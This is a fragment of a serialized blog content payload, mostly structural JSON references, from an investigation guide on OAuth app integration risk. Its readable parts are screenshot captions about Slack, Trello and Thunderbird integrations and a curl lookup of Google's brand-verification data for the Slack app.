},[327161],{"data":327162,"marks":327163,"value":318058,"nodeType":173},{},[],{"data":327165,"content":327166,"nodeType":178},{},[327167],{"data":327168,"marks":327169,"value":318065,"nodeType":173},{},[],{"data":327171,"content":327172,"nodeType":235},{},[327173],{"data":327174,"marks":327175,"value":318072,"nodeType":173},{},[],{"data":327177,"content":327178,"nodeType":178},{},[327179],{"data":327180,"marks":327181,"value":318079,"nodeType":173},{},[],{"data":327183,"content":327184,"nodeType":178},{},[327185],{"data":327186,"marks":327187,"value":318086,"nodeType":173},{},[],{"data":327189,"content":327190,"nodeType":178},{},[327191],{"data":327192,"marks":327193,"value":318093,"nodeType":173},{},[],{"data":327195,"content":327196,"nodeType":178},{},[327197],{"data":327198,"marks":327199,"value":318100,"nodeType":173},{},[],{"data":327201,"content":327204,"nodeType":312},{"target":327202},{"sys":327203},{"id":318105,"type":317,"linkType":318},[],{"data":327206,"content":327207,"nodeType":178},{},[327208],{"data":327209,"marks":327210,"value":318113,"nodeType":173},{},[],{"data":327212,"content":327213,"nodeType":235},{},[327214],{"data":327215,"marks":327216,"value":318120,"nodeType":173},{},[],{"data":327218,"content":327219,"nodeType":178},{},[327220],{"data":327221,"marks":327222,"value":318127,"nodeType":173},{},[],{"data":327224,"content":327225,"nodeType":178},{},[327226],{"data":327227,"marks":327228,"value":318134,"nodeType":173},{},[],{"data":327230,"content":327231,"nodeType":178},{},[327232,327235,327242],{"data":327233,"marks":327234,"value":318141,"nodeType":173},{},[],{"data":327236,"content":327237,"nodeType":186},{"uri":270424},[327238],{"data":327239,"marks":327240,"value":270427,"nodeType":173},{},[327241],{"type":194},{"data":327243,"marks":327244,"value":318152,"nodeType":173},{},[],{"data":327246,"content":327249,"nodeType":312},{"target":327247},{"sys":327248},{"id":318157,"type":317,"linkType":318},[],{"data":327251,"content":327252,"nodeType":178},{},[327253],{"data":327254,"marks":327255,"value":318165,"nodeType":173},{},[],{"data":327257,"content":327260,"nodeType":312},{"target":327258},{"sys":327259},{"id":318170,"type":317,"linkType":318},[],{"data":327262,"content":327263,"nodeType":178},{},[327264],{"data":327265,"marks":327266,"value":318178,"nodeType":173},{},[],{"data":327268,"content":327271,"nodeType":312},{"target":327269},{"sys":327270},{"id":318183,"type":317,"linkType":318},[],{"data":327273,"content":327274,"nodeType":235},{},[327275],{"data":327276,"marks":327277,"value":318191,"nodeType":173},{},[],{"data":327279,"content":327280,"nodeType":178},{},[327281],{"data":327282,"marks":327283,"value":318198,"nodeType":173},{},[],{"data":327285,"content":327286,"nodeType":178},{},[327287],{"data":327288,"marks":327289,"value":318205,"nodeType":173},{},[],{"data":327291,"content":327292,"nodeType":250},{},[327293,327302,327311,327320],{"data":327294,"content":327295,"nodeType":254},{},[327296],{"data":327297,"content":327298,"nodeType":178},{},[327299],{"data":327300,"marks":327301,"value":318218,"nodeType":173},{},[],{"data":327303,"content":327304,"nodeType":254},{},[327305],{"data":327306,"content":327307,"nodeType":178},{},[327308],{"data":327309,"marks":327310,"value":318228,"nodeType":173},{},[],{"data":327312,"content":327313,"nodeType":254},{},[327314],{"data":327315,"content":327316,"nodeType":178},{},[327317],{"data":327318,"marks":327319,"value":318238,"nodeType":173},{},[],{"data":327321,"content":327322,"nodeType":254},{},[327323],{"data":327324,"content":327325,"nodeType":178},{},[327326],{"data":327327,"marks":327328,"value":318248,"nodeType":173},{},[],{"data":327330,"content":327331,"nodeType":178},{},[327332],{"data":327333,"marks":327334,"value":318255,"nodeType":173},{},[],{"data":327336,"content":327337,"nodeType":178},{},[327338,327341,327348],{"data":327339,"marks":327340,"value":318262,"nodeType":173},{},[],{"data":327342,"content":327343,"nodeType":186},{"uri":318265},[327344],{"data":327345,"marks":327346,"value":318271,"nodeType":173},{},[327347],{"type":194},{"data":327349,"marks":327350,"value":318275,"nodeType":173},{},[],{"data":327352,"content":327353,"nodeType":178},{},[327354],{"data":327355,"marks":327356,"value":318282,"nodeType":173},{},[],{"data":327358,"content":327359,"nodeType":250},{},[327360,327369,327378,327387,327406,327421,327430],{"data":327361,"content":327362,"nodeType":254},{},[327363],{"data":327364,"content":327365,"nodeType":178},{},[327366],{"data":327367,"marks":327368,"value":318295,"nodeType":173},{},[],{"data":327370,"content":327371,"nodeType":254},{},[327372],{"data":327373,"content":327374,"nodeType":178},{},[327375],{"data":327376,"marks":327377,"value":318305,"nodeType":173},{},[],{"data":327379,"content":327380,"nodeType":254},{},[327381],{"data":327382,"content":327383,"nodeType":178},{},[327384],{"data":327385,"marks":327386,"value":318315,"nodeType":173},{},[],{"data":327388,"content":327389,"nodeType":254},{},[327390],{"data":327391,"content":327392,"nodeType":178},{},[327393,327396,327403],{"data":327394,"marks":327395,"value":37,"nodeType":173},{},[],{"data":327397,"content":327398,"nodeType":186},{"uri":318327},[327399],{"data":327400,"marks":327401,"value":318333,"nodeType":173},{},[327402],{"type":194},{"data":327404,"marks":327405,"value":37,"nodeType":173},{},[],{"data":327407,"content":327408,"nodeType":254},{},[327409],{"data":327410,"content":327411,"nodeType":250},{},[327412],{"data":327413,"content":327414,"nodeType":254},{},[327415],{"data":327416,"content":327417,"nodeType":178},{},[327418],{"data":327419,"marks":327420,"value":318352,"nodeType":173},{},[],{"data":327422,"content":327423,"nodeType":254},{},[327424],{"data":327425,"content":327426,"nodeType":178},{},[327427],{"data":327428,"marks":327429,"value":318362,"nodeType":173},{},[],{"data":327431,"content":327432,"nodeType":254},{},[327433],{"data":327434,"content":327435,"nodeType":178},{},[327436],{"data":327437,"marks":327438,"value":318372,"nodeType":173},{},[],{"data":327440,"content":327441,"nodeType":178},{},[327442,327445,327452],{"data":327443,"marks":327444,"value":318379,"nodeType":173},{},[],{"data":327446,"content":327447,"nodeType":186},{"uri":318382},[327448],{"data":327449,"marks":327450,"value":318388,"nodeType":173},{},[327451],{"type":194},{"data":327453,"marks":327454,"value":318392,"nodeType":173},{},[],{"data":327456,"content":327457,"nodeType":235},{},[327458],{"data":327459,"marks":327460,"value":40632,"nodeType":173},{},[],{"data":327462,"content":327463,"nodeType":178},{},[327464],{"data":327465,"marks":327466,"value":318405,"nodeType":173},{},[],{"data":327468,"content":327471,"nodeType":312},{"target":327469},{"sys":327470},{"id":318410,"type":317,"linkType":318},[],{"data":327473,"content":327474,"nodeType":178},{},[327475],{"data":327476,"marks":327477,"value":37,"nodeType":173},{},[],{"items":327479},[327480,327482],{"sys":327481,"name":509},{"id":508},{"sys":327483,"name":26137},{"id":26136},{"items":327485},[327486],{"fullName":155981,"firstName":155982,"jobTitle":155983,"profilePicture":327487},{"url":155985},{"__typename":1528,"sys":327489,"content":327490,"title":277468,"synopsis":289734,"hashTags":118,"publishedDate":289735,"slug":277469,"tagsCollection":327862,"authorsCollection":327866},{"id":276988},{"json":327491},{"nodeType":165,"data":327492,"content":327493},{},[327494,327500,327506,327512,327518,327524,327529,327535,327541,327547,327553,327558,327564,327569,327586,327592,327597,327614,327631,327646,327652,327658,327664,327670,327675,327680,327686,327692,327698,327704,327709,327715,327757,327762,327767,327783,327788,327794,327799,327805,327810,327816,327822,327827,327832,327838,327844,327850,327856],{"nodeType":178,"data":327495,"content":327496},{},[327497],{"nodeType":173,"value":289311,"marks":327498,"data":327499},[],{},{"nodeType":178,"data":327501,"content":327502},{},[327503],{"nodeType":173,"value":289318,"marks":327504,"data":327505},[],{},{"nodeType":169,"data":327507,"content":327508},{},[327509],{"nodeType":173,"value":289325,"marks":327510,"data":327511},[],{},{"nodeType":178,"data":327513,"content":327514},{},[327515],{"nodeType":173,"value":289332,"marks":327516,"data":327517},[],{},{"nodeType":178,"data":327519,"content":327520},{},[327521],{"nodeType":173,"value":289339,"marks":327522,"data":327523},[],{},{"nodeType":312,"data":327525,"content":327528},{"target":327526},{"sys":327527},{"id":289346,"type":317,"linkType":318},[],{"nodeType":178,"data":327530,"content":327531},{},[327532],{"nodeType":173,"value":289352,"marks":327533,"data":327534},[],{},{"nodeType":178,"data":327536,"content":327537},{},[327538],{"nodeType":173,"value":289359,"marks":327539,"data":327540},[],{},{"nodeType":178,"data":327542,"content":327543},{},[327544],{"nodeType":173,"value":289366,"marks":327545,"data":327546},[],{},{"nodeType":235,"data":327548,"content":327549},{},[327550],{"nodeType":173,"value":289373,"marks":327551,"data":327552},[],{},{"nodeType":312,"data":327554,"content":327557},{"target":327555},{"sys":327556},{"id":289380,"type":317,"linkType":318},[],{"nodeType":178,"data":327559,"content":327560},{},[327561],{"nodeType":173,"value":289386,"marks":327562,"data":327563},[],{},{"nodeType":312,"data":327565,"content":327568},{"target":327566},{"sys":327567},{"id":289393,"type":317,"linkType":318},[],{"nodeType":178,"data":327570,"content":327571},{},[327572,327575,327583],{"nodeType":173,"value":289399,"marks":327573,"data":327574},[],{},{"nodeType":1698,"data":327576,"content":327579},{"target":327577},{"sys":327578},{"id":289406,"type":317,"linkType":318},[327580],{"nodeType":173,"value":155323,"marks":327581,"data":327582},[],{},{"nodeType":173,"value":1477,"marks":327584,"data":327585},[],{},{"nodeType":235,"data":327587,"content":327588},{},[327589],{"nodeType":173,"value":289418,"marks":327590,"data":327591},[],{},{"nodeType":312,"data":327593,"content":327596},{"target":327594},{"sys":327595},{"id":289425,"type":317,"linkType":318},[],{"nodeType":178,"data":327598,"content":327599},{},[327600,327603,327611],{"nodeType":173,"value":289431,"marks":327601,"data":327602},[],{},{"nodeType":1698,"data":327604,"content":327607},{"target":327605},{"sys":327606},{"id":269483,"type":317,"linkType":318},[327608],{"nodeType":173,"value":155323,"marks":327609,"data":327610},[],{},{"nodeType":173,"value":197,"marks":327612,"data":327613},[],{},{"nodeType":178,"data":327615,"content":327616},{},[327617,327620,327628],{"nodeType":173,"value":289449,"marks":327618,"data":327619},[],{},{"nodeType":1698,"data":327621,"content":327624},{"target":327622},{"sys":327623},{"id":269414,"type":317,"linkType":318},[327625],{"nodeType":173,"value":8091,"marks":327626,"data":327627},[],{},{"nodeType":173,"value":289461,"marks":327629,"data":327630},[],{},{"nodeType":178,"data":327632,"content":327633},{},[327634,327637,327643],{"nodeType":173,"value":289468,"marks":327635,"data":327636},[],{},{"nodeType":186,"data":327638,"content":327639},{"uri":289473},[327640],{"nodeType":173,"value":289476,"marks":327641,"data":327642},[],{},{"nodeType":173,"value":289480,"marks":327644,"data":327645},[],{},{"nodeType":235,"data":327647,"content":327648},{},[327649],{"nodeType":173,"value":289487,"marks":327650,"data":327651},[],{},{"nodeType":178,"data":327653,"content":327654},{},[327655],{"nodeType":173,"value":289494,"marks":327656,"data":327657},[],{},{"nodeType":178,"data":327659,"content":327660},{},[327661],{"nodeType":173,"value":289501,"marks":327662,"data":327663},[],{},{"nodeType":178,"data":327665,"content":327666},{},[327667],{"nodeType":173,"value":289508,"marks":327668,"data":327669},[],{},{"nodeType":312,"data":327671,"content":327674},{"target":327672},{"sys":327673},{"id":289515,"type":317,"linkType":318},[],{"nodeType":312,"data":327676,"content":327679},{"target":327677},{"sys":327678},{"id":289521,"type":317,"linkType":318},[],{"nodeType":235,"data":327681,"content":327682},{},[327683],{"nodeType":173,"value":289527,"marks":327684,"data":327685},[],{},{"nodeType":178,"data":327687,"content":327688},{},[327689],{"nodeType":173,"value":289534,"marks":327690,"data":327691},[],{},{"nodeType":178,"data":327693,"content":327694},{},[327695],{"nodeType":173,"value":289541,"marks":327696,"data":327697},[],{},{"nodeType":178,"data":327699,"content":327700},{},[327701],{"nodeType":173,"value":289548,"marks":327702,"data":327703},[],{},{"nodeType":312,"data":327705,"content":327708},{"target":327706},{"sys":327707},{"id":289555,"type":317,"linkType":318},[],{"nodeType":178,"data":327710,"content":327711},{},[327712],{"nodeType":173,"value":289561,"marks":327713,"data":327714},[],{},{"nodeType":250,"data":327716,"content":327717},{},[327718,327731,327744],{"nodeType":254,"data":327719,"content":327720},{},[327721],{"nodeType":178,"data":327722,"content":327723},{},[327724,327728],{"nodeType":173,"value":289574,"marks":327725,"data":327727},[327726],{"type":370},{},{"nodeType":173,"value":289579,"marks":327729,"data":327730},[],{},{"nodeType":254,"data":327732,"content":327733},{},[327734],{"nodeType":178,"data":327735,"content":327736},{},[327737,327741],{"nodeType":173,"value":289589,"marks":327738,"data":327740},[327739],{"type":370},{},{"nodeType":173,"value":289594,"marks":327742,"data":327743},[],{},{"nodeType":254,"data":327745,"content":327746},{},[327747],{"nodeType":178,"data":327748,"content":327749},{},[327750,327754],{"nodeType":173,"value":289604,"marks":327751,"data":327753},[327752],{"type":370},{},{"nodeType":173,"value":289609,"marks":327755,"data":327756},[],{},{"nodeType":312,"data":327758,"content":327761},{"target":327759},{"sys":327760},{"id":289616,"type":317,"linkType":318},[],{"nodeType":312,"data":327763,"content":327766},{"target":327764},{"sys":327765},{"id":289622,"type":317,"linkType":318},[],{"nodeType":250,"data":327768,"content":327769},{},[327770],{"nodeType":254,"data":327771,"content":327772},{},[327773],{"nodeType":178,"data":327774,"content":327775},{},[327776,327780],{"nodeType":173,"value":289634,"marks":327777,"data":327779},[327778],{"type":370},{},{"nodeType":173,"value":289639,"marks":327781,"data":327782},[],{},{"nodeType":312,"data":327784,"content":327787},{"target":327785},{"sys":327786},{"id":289646,"type":317,"linkType":318},[],{"nodeType":178,"data":327789,"content":327790},{},[327791],{"nodeType":173,"value":289652,"marks":327792,"data":327793},[],{},{"nodeType":312,"data":327795,"content":327798},{"target":327796},{"sys":327797},{"id":289659,"type":317,"linkType":318},[],{"nodeType":235,"data":327800,"content":327801},{},[327802],{"nodeType":173,"value":289665,"marks":327803,"data":327804},[],{},{"nodeType":312,"data":327806,"content":327809},{"target":327807},{"sys":327808},{"id":289672,"type":317,"linkType":318},[],{"nodeType":178,"data":327811,"content":327812},{},[327813],{"nodeType":173,"value":289678,"marks":327814,"data":327815},[],{},{"nodeType":178,"data":327817,"content":327818},{},[327819],{"nodeType":173,"value":289685,"marks":327820,"data":327821},[],{},{"nodeType":312,"data":327823,"content":327826},{"target":327824},{"sys":327825},{"id":289692,"type":317,"linkType":318},[],{"nodeType":312,"data":327828,"content":327831},{"target":327829},{"sys":327830},{"id":289698,"type":317,"linkType":318},[],{"nodeType":235,"data":327833,"content":327834},{},[327835],{"nodeType":173,"value":40632,"marks":327836,"data":327837},[],{},{"nodeType":178,"data":327839,"content":327840},{},[327841],{"nodeType":173,"value":289710,"marks":327842,"data":327843},[],{},{"nodeType":178,"data":327845,"content":327846},{},[327847],{"nodeType":173,"value":289717,"marks":327848,"data":327849},[],{},{"nodeType":178,"data":327851,"content":327852},{},[327853],{"nodeType":173,"value":289724,"marks":327854,"data":327855},[],{},{"nodeType":178,"data":327857,"content":327858},{},[327859],{"nodeType":173,"value":289731,"marks":327860,"data":327861},[],{},{"items":327863},[327864],{"sys":327865,"name":505},{"id":504},{"items":327867},[327868],{"fullName":8611,"firstName":8612,"jobTitle":8613,"profilePicture":327869},{"url":8615},{"items":327871},[327872],{"fullName":8611,"firstName":8612,"jobTitle":8613,"profilePicture":327873},{"url":8615},{"json":327875,"links":328264},{"data":327876,"content":327877,"nodeType":165},{},[327878,327884,327891,327897,327927,327933,327940,327966,327982,327988,327993,327998,328005,328011,328016,328021,328027,328033,328039,328054,328059,328065,328081,328087,328092,328099,328105,328111,328127,328133,328139,328145,328150,328156,328161,328167,328172,328178,328195,328202,328208,328214,328220,328225,328240,328246,328251,328258],{"data":327879,"content":327880,"nodeType":178},{},[327881],{"data":327882,"marks":327883,"value":292551,"nodeType":173},{},[],{"data":327885,"content":327886,"nodeType":235},{},[327887],{"data":327888,"marks":327889,"value":258287,"nodeType":173},{},[327890],{"type":370},{"data":327892,"content":327893,"nodeType":178},{},[327894],{"data":327895,"marks":327896,"value":292565,"nodeType":173},{},[],{"data":327898,"content":327899,"nodeType":250},{},[327900,327909,327918],{"data":327901,"content":327902,"nodeType":254},{},[327903],{"data":327904,"content":327905,"nodeType":178},{},[327906],{"data":327907,"marks":327908,"value":292578,"nodeType":173},{},[],{"data":327910,"content":327911,"nodeType":254},{},[327912],{"data":327913,"content":327914,"nodeType":178},{},[327915],{"data":327916,"marks":327917,"value":292588,"nodeType":173},{},[],{"data":327919,"content":327920,"nodeType":254},{},[327921],{"data":327922,"content":327923,"nodeType":178},{},[327924],{"data":327925,"marks":327926,"value":292598,"nodeType":173},{},[],{"data":327928,"content":327929,"nodeType":178},{},[327930],{"data":327931,"marks":327932,"value":292605,"nodeType":173},{},[],{"data":327934,"content":327935,"nodeType":235},{},[327936],{"data":327937,"marks":327938,"value":292613,"nodeType":173},{},[327939],{"type":370},{"data":327941,"content":327942,"nodeType":178},{},[327943,327946,327953,327956,327963],{"data":327944,"marks":327945,"value":292620,"nodeType":173},{},[],{"data":327947,"content":327948,"nodeType":186},{"uri":292623},[327949],{"data":327950,"marks":327951,"value":292629,"nodeType":173},{},[327952],{"type":194},{"data":327954,"marks":327955,"value":292633,"nodeType":173},{},[],{"data":327957,"content":327958,"nodeType":186},{"uri":292636},[327959],{"data":327960,"marks":327961,"value":292642,"nodeType":173},{},[327962],{"type":194},{"data":327964,"marks":327965,"value":292646,"nodeType":173},{},[],{"data":327967,"content":327968,"nodeType":178},{},[327969,327972,327979],{"data":327970,"marks":327971,"value":292653,"nodeType":173},{},[],{"data":327973,"content":327974,"nodeType":186},{"uri":292656},[327975],{"data":327976,"marks":327977,"value":292662,"nodeType":173},{},[327978],{"type":194},{"data":327980,"marks":327981,"value":292666,"nodeType":173},{},[],{"data":327983,"content":327984,"nodeType":178},{},[327985],{"data":327986,"marks":327987,"value":292673,"nodeType":173},{},[],{"data":327989,"content":327992,"nodeType":312},{"target":327990},{"sys":327991},{"id":292678,"type":317,"linkType":318},[],{"data":327994,"content":327997,"nodeType":312},{"target":327995},{"sys":327996},{"id":292684,"type":317,"linkType":318},[],{"data":327999,"content":328000,"nodeType":235},{},[328001],{"data":328002,"marks":328003,"value":292693,"nodeType":173},{},[328004],{"type":370},{"data":328006,"content":328007,"nodeType":178},{},[328008],{"data":328009,"marks":328010,"value":292700,"nodeType":173},{},[],{"data":328012,"content":328015,"nodeType":312},{"target":328013},{"sys":328014},{"id":292705,"type":317,"linkType":318},[],{"data":328017,"content":328020,"nodeType":312},{"target":328018},{"sys":328019},{"id":292711,"type":317,"linkType":318},[],{"data":328022,"content":328023,"nodeType":178},{},[328024],{"data":328025,"marks":328026,"value":292719,"nodeType":173},{},[],{"data":328028,"content":328029,"nodeType":178},{},[328030],{"data":328031,"marks":328032,"value":292726,"nodeType":173},{},[],{"data":328034,"content":328035,"nodeType":178},{},[328036],{"data":328037,"marks":328038,"value":292733,"nodeType":173},{},[],{"data":328040,"content":328041,"nodeType":178},{},[328042,328045,328051],{"data":328043,"marks":328044,"value":292740,"nodeType":173},{},[],{"data":328046,"content":328047,"nodeType":186},{"uri":292743},[328048],{"data":328049,"marks":328050,"value":292748,"nodeType":173},{},[],{"data":328052,"marks":328053,"value":292752,"nodeType":173},{},[],{"data":328055,"content":328058,"nodeType":312},{"target":328056},{"sys":328057},{"id":292757,"type":317,"linkType":318},[],{"data":328060,"content":328061,"nodeType":178},{},[328062],{"data":328063,"marks":328064,"value":292765,"nodeType":173},{},[],{"data":328066,"content":328067,"nodeType":178},{},[328068,328071,328078],{"data":328069,"marks":328070,"value":292772,"nodeType":173},{},[],{"data":328072,"content":328073,"nodeType":186},{"uri":292775},[328074],{"data":328075,"marks":328076,"value":292781,"nodeType":173},{},[328077],{"type":194},{"data":328079,"marks":328080,"value":292785,"nodeType":173},{},[],{"data":328082,"content":328083,"nodeType":178},{},[328084],{"data":328085,"marks":328086,"value":292792,"nodeType":173},{},[],{"data":328088,"content":328091,"nodeType":312},{"target":328089},{"sys":328090},{"id":292797,"type":317,"linkType":318},[],{"data":328093,"content":328094,"nodeType":235},{},[328095],{"data":328096,"marks":328097,"value":292806,"nodeType":173},{},[328098],{"type":370},{"data":328100,"content":328101,"nodeType":178},{},[328102],{"data":328103,"marks":328104,"value":292813,"nodeType":173},{},[],{"data":328106,"content":328107,"nodeType":178},{},[328108],{"data":328109,"marks":328110,"value":292820,"nodeType":173},{},[],{"data":328112,"content":328113,"nodeType":178},{},[328114,328117,328124],{"data":328115,"marks":328116,"value":292827,"nodeType":173},{},[],{"data":328118,"content":328119,"nodeType":186},{"uri":292830},[328120],{"data":328121,"marks":328122,"value":292836,"nodeType":173},{},[328123],{"type":194},{"data":328125,"marks":328126,"value":197,"nodeType":173},{},[],{"data":328128,"content":328129,"nodeType":178},{},[328130],{"data":328131,"marks":328132,"value":292846,"nodeType":173},{},[],{"data":328134,"content":328135,"nodeType":178},{},[328136],{"data":328137,"marks":328138,"value":292853,"nodeType":173},{},[],{"data":328140,"content":328141,"nodeType":178},{},[328142],{"data":328143,"marks":328144,"value":292860,"nodeType":173},{},[],{"data":328146,"content":328149,"nodeType":312},{"target":328147},{"sys":328148},{"id":292865,"type":317,"linkType":318},[],{"data":328151,"content":328152,"nodeType":178},{},[328153],{"data":328154,"marks":328155,"value":292873,"nodeType":173},{},[],{"data":328157,"content":328160,"nodeType":312},{"target":328158},{"sys":328159},{"id":292878,"type":317,"linkType":318},[],{"data":328162,"content":328163,"nodeType":178},{},[328164],{"data":328165,"marks":328166,"value":292886,"nodeType":173},{},[],{"data":328168,"content":328171,"nodeType":312},{"target":328169},{"sys":328170},{"id":292891,"type":317,"linkType":318},[],{"data":328173,"content":328174,"nodeType":178},{},[328175],{"data":328176,"marks":328177,"value":292899,"nodeType":173},{},[],{"data":328179,"content":328180,"nodeType":178},{},[328181,328184,328192],{"data":328182,"marks":328183,"value":292906,"nodeType":173},{},[],{"data":328185,"content":328188,"nodeType":1698},{"target":328186},{"sys":328187},{"id":273995,"type":317,"linkType":318},[328189],{"data":328190,"marks":328191,"value":28052,"nodeType":173},{},[],{"data":328193,"marks":328194,"value":292918,"nodeType":173},{},[],{"data":328196,"content":328197,"nodeType":235},{},[328198],{"data":328199,"marks":328200,"value":292926,"nodeType":173},{},[328201],{"type":370},{"data":328203,"content":328204,"nodeType":178},{},[328205],{"data":328206,"marks":328207,"value":292933,"nodeType":173},{},[],{"data":328209,"content":328210,"nodeType":178},{},[328211],{"data":328212,"marks":328213,"value":292940,"nodeType":173},{},[],{"data":328215,"content":328216,"nodeType":178},{},[328217],{"data":328218,"marks":328219,"value":292947,"nodeType":173},{},[],{"data":328221,"content":328224,"nodeType":312},{"target":328222},{"sys":328223},{"id":292952,"type":317,"linkType":318},[],{"data":328226,"content":328227,"nodeType":178},{},[328228,328231,328237],{"data":328229,"marks":328230,"value":292960,"nodeType":173},{},[],{"data":328232,"content":328233,"nodeType":186},{"uri":292963},[328234],{"data":328235,"marks":328236,"value":28052,"nodeType":173},{},[],{"data":328238,"marks":328239,"value":292971,"nodeType":173},{},[],{"data":328241,"content":328242,"nodeType":178},{},[328243],{"data":328244,"marks":328245,"value":292978,"nodeType":173},{},[],{"data":328247,"content":328250,"nodeType":312},{"target":328248},{"sys":328249},{"id":292983,"type":317,"linkType":318},[],{"data":328252,"content":328253,"nodeType":235},{},[328254],{"data":328255,"marks":328256,"value":40632,"nodeType":173},{},[328257],{"type":370},{"data":328259,"content":328260,"nodeType":178},{},[328261],{"data":328262,"marks":328263,"value":292998,"nodeType":173},{},[],{"entries":328265},{"inline":328266,"hyperlink":328267,"block":328270},[],[328268],{"sys":328269,"__typename":1528,"title":284931,"slug":284932},{"id":273995},[328271,328278,328285,328293,328301,328308,328312,328319,328326,328333,328339],{"sys":328272,"__typename":5345,"title":328273,"caption":328273,"layoutMode":328274,"file":328275},{"id":292678},"Social login to Slack","Left aligned",{"url":328276,"width":89489,"height":328277},"https://images.ctfassets.net/y1cdw1ablpvd/5fE5HSCtxJCwiSOiOaaG7o/639e5033b710b30c8de9b669e08572b9/image2.png",223,{"sys":328279,"__typename":5345,"title":328280,"caption":328281,"layoutMode":328274,"file":328282},{"id":292684},"Google admin interface Slack app","Slack integration within the Google admin interface",{"url":328283,"width":5358,"height":328284},"https://images.ctfassets.net/y1cdw1ablpvd/r04yvAAhlbTQAQRCkY8Bv/9f6bdfeb8c9210f36d7ae6bf5b72566b/image3.png",965,{"sys":328286,"__typename":5345,"title":328287,"caption":328288,"layoutMode":328274,"file":328289},{"id":292705},"Trello integration unverified","An unverified Trello integration",{"url":328290,"width":328291,"height":328292},"https://images.ctfassets.net/y1cdw1ablpvd/2WSgNWcGqrWNQISb8buhOF/e058a59fc3c932824723f794dfd72637/image9.png",340,170,{"sys":328294,"__typename":5345,"title":328295,"caption":328296,"layoutMode":328274,"file":328297},{"id":292711},"Permissions for unverified Trello app","A snippet of the permissions request dialog for the Trello app",{"url":328298,"width":328299,"height":328300},"https://images.ctfassets.net/y1cdw1ablpvd/4hYioezvlfTTDxhyJrDIVt/247dc24800473451791cf403e2f125f8/image7.png",442,262,{"sys":328302,"__typename":5345,"title":328303,"caption":328303,"layoutMode":328274,"file":328304},{"id":292757},"Reply URL for unverified Trello app",{"url":328305,"width":328306,"height":328307},"https://images.ctfassets.net/y1cdw1ablpvd/ISg8hPXTh5e2rKiPECRIy/c4333b96ea789b97fbbdceea9db88d1a/image10.png",960,126,{"sys":328309,"__typename":134274,"name":328310,"type":5439,"syntax":328311},{"id":292797},"Undocumented Google API output for Slack app integration","% curl -H \"Origin: https://console.cloud.google.com\" \"https://clientauthconfig.googleapis.com/v1/brands/lookupkey/brand/19570130570?readMask=*&readOptions.staleness=0.02s&returnDeveloperBrand=true&returnDisabledBrands=true&key=AIzaSyCI-zsRP85UVOi0DjtiCwWBwQ1djDy741g\"\n{\n  \"brandId\": \"19570130570\",\n  \"projectNumbers\": [\n    \"19570130570\"\n  ],\n  \"displayName\": \"Slack\",\n  \"iconUrl\": \"https://lh3.googleusercontent.com/J5SGBWHMF0_vgcIekl1hEhJ1-_p_zsG3L0i1s_bU2bK_TiSLObT7kK1Le9tnme1h3zA\",\n  \"supportEmail\": \"help@slack-corp.com\",\n  \"homePageUrl\": \"http://slack.com/\",\n  \"termsOfServiceUrls\": [\n    \"https://slack.com/terms-of-service\"\n  ],\n  \"privacyPolicyUrls\": [\n    \"https://slack.com/privacy-policy\"\n  ],\n  \"brandState\": {\n    \"limits\": {\n      \"defaultMaxClientCount\": 36\n    }\n  },\n  \"verifiedBrand\": {\n    \"displayName\": {\n      \"value\": \"Slack\",\n      \"reason\": \"APPEALED\"\n    },\n    \"storedIconUrl\": {\n      \"value\": \"https://lh3.googleusercontent.com/J5SGBWHMF0_vgcIekl1hEhJ1-_p_zsG3L0i1s_bU2bK_TiSLObT7kK1Le9tnme1h3zA\",\n      \"reason\": \"APPEALED\"\n    },\n    \"supportEmail\": {\n      \"value\": \"help@slack-corp.com\",\n      \"reason\": \"APPEALED\"\n    },\n    \"homePageUrl\": {\n      \"value\": \"http://slack.com/\",\n      \"reason\": \"APPEALED\"\n    },\n    \"privacyPolicyUrl\": {\n      \"value\": \"https://slack.com/privacy-policy\",\n      \"reason\": \"APPEALED\"\n    },\n    \"termsOfServiceUrl\": {\n      \"value\": \"https://slack.com/terms-of-service\",\n      \"reason\": \"APPEALED\"\n    }\n  },\n  \"storedIconUrl\": \"https://lh3.googleusercontent.com/J5SGBWHMF0_vgcIekl1hEhJ1-_p_zsG3L0i1s_bU2bK_TiSLObT7kK1Le9tnme1h3zA\",\n  \"consistencyToken\": \"2020-12-04T13:12:40.648327Z\"\n}\n",{"sys":328313,"__typename":5345,"title":328314,"caption":328314,"layoutMode":328274,"file":328315},{"id":292865},"OAuth permissions shared among multiple users",{"url":328316,"width":328317,"height":328318},"https://images.ctfassets.net/y1cdw1ablpvd/1JHLqZMqeqnHasvQk9xuTQ/a77fa0afee66150bb2bac14fe15501a2/image11.png",1456,348,{"sys":328320,"__typename":5345,"title":328321,"caption":328321,"layoutMode":328274,"file":328322},{"id":292878},"Additional permissions for different users for the same integration",{"url":328323,"width":328324,"height":328325},"https://images.ctfassets.net/y1cdw1ablpvd/5TupKuFwjurR3ruCi2EjYK/d22b2158da8f57cd1d902452edd0a8d8/image8.png",1042,508,{"sys":328327,"__typename":5345,"title":328328,"caption":328328,"layoutMode":328274,"file":328329},{"id":292891},"Additional user consent screen for OAuth integration",{"url":328330,"width":328331,"height":328332},"https://images.ctfassets.net/y1cdw1ablpvd/6rR3a2Otef1eeFBoDyakDp/5696d6b2017e3e328b61938abc376e91/image6.png",470,949,{"sys":328334,"__typename":5345,"title":328335,"caption":328335,"layoutMode":328274,"file":328336},{"id":292952},"Activity log for Thunderbird email integration",{"url":328337,"width":5358,"height":328338},"https://images.ctfassets.net/y1cdw1ablpvd/1RXpUsmbZ36UYUEIQNtFu9/b8b87d063e2a3e4eface9504b623fa93/image5.png",209,{"sys":328340,"__typename":5345,"title":328341,"caption":328341,"layoutMode":328274,"file":328342},{"id":292983},"Detailed activity audit data for Thunderbird integration",{"url":328343,"width":290634,"height":328344},"https://images.ctfassets.net/y1cdw1ablpvd/xknN2HxbPK7igpYqUlbq9/969a89ace999f174c776be67ff702e9b/image1.png",648,"content:blog:an-investigation-guide-for-assessing-app-to-app-oauth-integration-risk.json","blog/an-investigation-guide-for-assessing-app-to-app-oauth-integration-risk.json","blog/an-investigation-guide-for-assessing-app-to-app-oauth-integration-risk",{"_path":328349,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":328350,"ogImage":118,"summary":328352,"title":270678,"subtitle":118,"metaTitle":328363,"synopsis":269387,"hashTags":118,"publishedDate":270679,"slug":270680,"tagsCollection":328364,"relatedBlogPostsCollection":328370,"authorsCollection":328949,"content":328953,"_id":330164,"_type":5439,"_source":5440,"_file":330165,"_stem":330166,"_extension":5439},"/blog/how-attackers-compromise-azure-organizations-through-saas-apps",{"id":269371,"publishedAt":328351},"2023-08-31T12:26:21.402Z",{"json":328353},{"data":328354,"content":328355,